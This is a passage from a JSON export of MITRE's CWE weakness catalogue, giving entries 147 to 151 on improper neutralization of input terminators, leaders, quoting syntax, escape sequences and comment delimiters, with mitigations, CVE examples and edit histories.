Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Delimiter between Expressions or Commands","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Expression/Command Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"147":{"attr":{"@_ID":"147","@_Name":"Improper Neutralization of Input Terminators","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as input terminators when they are sent to a downstream component.","Extended_Description":"For example, a \\".\\" in SMTP signifies the end of mail message data, whereas a null character can be used for the end of a string.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that terminators will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0319","Description":"MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0319"},{"Reference":"CVE-2000-0320","Description":"MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0320"},{"Reference":"CVE-2001-0996","Description":"Mail server does not quote end-of-input terminator if it appears in the middle of a message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0996"},{"Reference":"CVE-2002-0001","Description":"Improperly terminated comment or phrase allows commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0001"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Input Terminator"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"460"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Input Terminator","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Input Terminator","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Input Terminators","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Input Terminators","attr":{"@_Date":"2010-04-05"}}]}},"148":{"attr":{"@_ID":"148","@_Name":"Improper Neutralization of Input Leaders","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not properly handle when a leading character or sequence (\\"leader\\") is missing or malformed, or if multiple leaders are used when only one should be allowed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that leading characters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Input Leader"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Input Leader","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Input Leader","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Input Leaders","attr":{"@_Date":"2010-06-21"}}]}},"149":{"attr":{"@_ID":"149","@_Name":"Improper Neutralization of Quoting Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Quotes injected into an application can be used to compromise a system. As data are parsed, an injected/absent/duplicate/malformed use of quotes may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that quotes will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0956","Description":"Database allows remote attackers to cause a denial of service (application crash) via a MATCH AGAINST query with an opening double quote but no closing double quote.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0956"},{"Reference":"CVE-2003-1016","Description":"MIE. MFV too? bypass AV/security with fields that should not be quoted, duplicate quotes, missing leading/trailing quotes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1016"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Quoting Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"468"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Quoting Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Quoting Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Quoting Syntax","attr":{"@_Date":"2010-06-21"}}]}},"150":{"attr":{"@_ID":"150","@_Name":"Improper Neutralization of Escape, Meta, or Control Sequences","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that escape, meta and control characters/sequences will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0542","Description":"The mail program processes special \\"~\\" escape sequence even when not in interactive mode.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0542"},{"Reference":"CVE-2000-0703","Description":"Setuid program does not filter escape sequences before calling mail program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0703"},{"Reference":"CVE-2002-0986","Description":"Mail function does not filter control characters from arguments, allowing mail message content to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0986"},{"Reference":"CVE-2003-0020","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020"},{"Reference":"CVE-2003-0083","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083"},{"Reference":"CVE-2003-0021","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0021"},{"Reference":"CVE-2003-0022","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0022"},{"Reference":"CVE-2003-0023","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0023"},{"Reference":"CVE-2003-0063","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0063"},{"Reference":"CVE-2000-0476","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0476"},{"Reference":"CVE-2001-1556","Description":"MFV. (multi-channel). Injection of control characters into log files that allow information hiding when using raw Unix programs to read the files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1556"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Escape, Meta, or Control Character / Sequence"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"134"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Escape, Meta, or Control Character / Sequence","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Escape, Meta, or Control Character / Sequence","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Escape, Meta, or Control Sequences","attr":{"@_Date":"2010-04-05"}}]}},"151":{"attr":{"@_ID":"151","@_Name":"Improper Neutralization of Comment Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as comment delimiters when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that comments will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0001","Description":"Mail client command execution due to improperly terminated comment in address list.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0001"},{"Reference":"CVE-2004-0162","Description":"MIE. RFC822 comment fields may be processed as other fields by clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0162"},{"Reference":"CVE-2004-1686","Description":"Well-placed comment bypasses security warning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1686"},{"Reference":"CVE-2005-1909","Description":"Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow \\"&gt;!--\\" while denying most other tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1909"},{"Reference":"CVE-2005-1969","Description":"Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow \\"&lt;!--\\" while denying most other tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1969"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Comment Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, 